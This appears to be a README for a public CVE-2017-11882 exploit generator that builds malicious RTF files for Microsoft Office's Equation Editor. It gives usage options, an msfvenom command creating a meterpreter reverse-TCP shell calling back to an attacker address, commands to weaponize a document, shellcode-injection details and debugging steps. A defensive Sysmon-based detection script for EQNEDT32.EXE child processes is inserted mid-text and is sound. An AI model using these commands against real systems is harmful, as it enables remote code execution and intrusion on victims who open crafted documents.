This CVE-2017-11882 exploit accepts a command or code of up to a little over 17k bytes.
For remote command execution, this exploit calls WinExec with SW_HIDE and calls ExitProcess after WinExec returns.
For remote code execution, this exploit just jumps to the code.
I cannot find a reference for the object structure, so I cannot change the file length for arbitrary-length code execution. :(
But I do think 17k bytes is really enough. The Python script will detect the payload size you need and choose the correct payload template.
Caution: RCE will hang the winword process if you don't migrate to another process!
Currently this exploit will inject your shellcode into a new EQNEDT32.EXE process if you specify the -i flag. This operation looks suspicious to AV, but it won't hang the Word process.
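From the defender's side, the behaviour described above (WinExec called from the exploited Equation Editor, or a new EQNEDT32.EXE process with -i) appears in process-creation telemetry as EQNEDT32.EXE acting as a parent process. The following detection sketch is an added example, not part of this project's code; the field names follow Sysmon process-creation events, the sample records are constructed, and it assumes the new EQNEDT32.EXE process is created by the exploited one.

```python
import csv
import io
import ntpath

TARGET = "eqnedt32.exe"

# Constructed process-creation records (Sysmon Event ID 1 style fields), not real telemetry.
SAMPLE_EVENTS = r"""ProcessId,Image,CommandLine,ParentImage
4120,C:\Program Files\Microsoft Office\Office16\WINWORD.EXE,WINWORD.EXE /n test.rtf,C:\Windows\explorer.exe
4888,C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE,EQNEDT32.EXE -Embedding,C:\Windows\System32\svchost.exe
5012,C:\Windows\System32\cmd.exe,cmd.exe,C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE
5300,C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE,EQNEDT32.EXE,C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE
5410,C:\Windows\System32\notepad.exe,notepad.exe,C:\Windows\explorer.exe
"""


def image_name(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def find_suspicious(events_csv):
    """Return (pid, child image, reason) for every process started by EQNEDT32.EXE."""
    findings = []
    for row in csv.DictReader(io.StringIO(events_csv)):
        if image_name(row["ParentImage"]) != TARGET:
            continue  # Equation Editor is not the parent: out of scope here
        child = image_name(row["Image"])
        if child == TARGET:
            reason = "EQNEDT32.EXE started another EQNEDT32.EXE (possible injection host)"
        else:
            reason = "EQNEDT32.EXE started a child process"
        findings.append((row["ProcessId"], child, reason))
    return findings


if __name__ == "__main__":
    for pid, child, reason in find_suspicious(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} image={child}: {reason}")
```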
usage: CVE-2017-11882.py [-h] -c CMD [-t {0,1}] [-i INJECT] -o OUTPUT
Exploit for CVE-2017-11882 @unamer(https://github.com/unamer/CVE-2017-11882)
optional arguments:
  -h, --help            show this help message and exit
  -c CMD, --cmd CMD     Command or shellcode file to run in target system
                        (Must be shorter than 17967 bytes!!)
  -t {0,1}, --type {0,1}
                        Type (0:shellcode 1:command, default=1)
  -i INJECT, --inject INJECT
                        Inject shellcode to new process
  -o OUTPUT, --output OUTPUT
                        Output exploit rtf
Example:
For remote command execution
CVE-2017-11882.py -c cmd.exe -o test.rtf
For remote code execution
- Generate some shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.115 LPORT=2333 -o ./sc.bin
- Generate exploit
CVE-2017-11882.py -c sc.bin -t 0 -i 1 -o test.rtf
- Set the Debugger value to your debugger's path in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EQNEDT32.EXE
- Build an exploit and run it.
- Set a breakpoint at 0x41165f
- This breakpoint will be hit twice; the second time, the payload will be executed after this function returns.